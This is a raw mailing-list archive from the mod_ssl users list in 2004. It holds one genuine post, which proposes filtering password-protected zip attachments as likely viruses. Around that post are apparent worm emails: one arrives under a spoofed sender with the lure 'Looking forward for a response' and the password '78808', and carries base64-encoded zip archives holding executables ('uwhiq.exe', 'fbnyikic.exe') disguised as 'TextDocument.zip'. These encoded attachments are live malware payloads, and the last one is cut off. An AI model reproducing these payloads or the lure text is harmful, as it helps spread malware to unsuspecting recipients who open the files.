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
AQA6AAAAIkUAAAAA

----------beyuquybqctnuasdbddp--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  4 11:07:21 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AA578A8AA1; Thu,  4 Mar 2004 11:07:21 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gw.reea.net (reea.ms.fx.ro [193.230.173.18])
	by master.modssl.org (Postfix) with ESMTP id 297B4A8944
	for ; Thu,  4 Mar 2004 11:07:06 +0100 (CET)
Received: from reea.net (borkstation.ms.reea.net [192.168.0.19])
	by gw.reea.net (8.12.8/8.12.8) with ESMTP id i249EsTJ031736
	for ; Thu, 4 Mar 2004 11:15:14 +0200
Message-ID: <4046F38E.9000302@reea.net>
Date: Thu, 04 Mar 2004 11:14:54 +0200
From: marius popa 
User-Agent: Mozilla Thunderbird 0.5 (X11/20040208)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: zip files on the modssl list ? solution
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: marius popa 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

i know that in mimedefang you can make some rules like

if (attachment = zip) and (password protected) then drop it (it's 80% 
chances a virus)

good ideea ?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  4 13:04:31 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 87265A8A9F; Thu,  4 Mar 2004 13:04:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from studenten-pc-3 (studenten-pc-3-classroom.geo.uni-bremen.de [134.102.241.63])
	by master.modssl.org (Postfix) with SMTP id 49027A8944
	for ; Thu,  4 Mar 2004 13:04:30 +0100 (CET)
Date: Thu, 04 Mar 2004 13:04:28 +0100
To: modssl-users@modssl.org
Subject: :-)
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------nwpmosppwjqenstmvlal"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------nwpmosppwjqenstmvlal
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

 Looking  forward  for a response  :P

pass:  78808

----------nwpmosppwjqenstmvlal
Content-Type: application/octet-stream; name="TextDocument.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="TextDocument.zip"

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
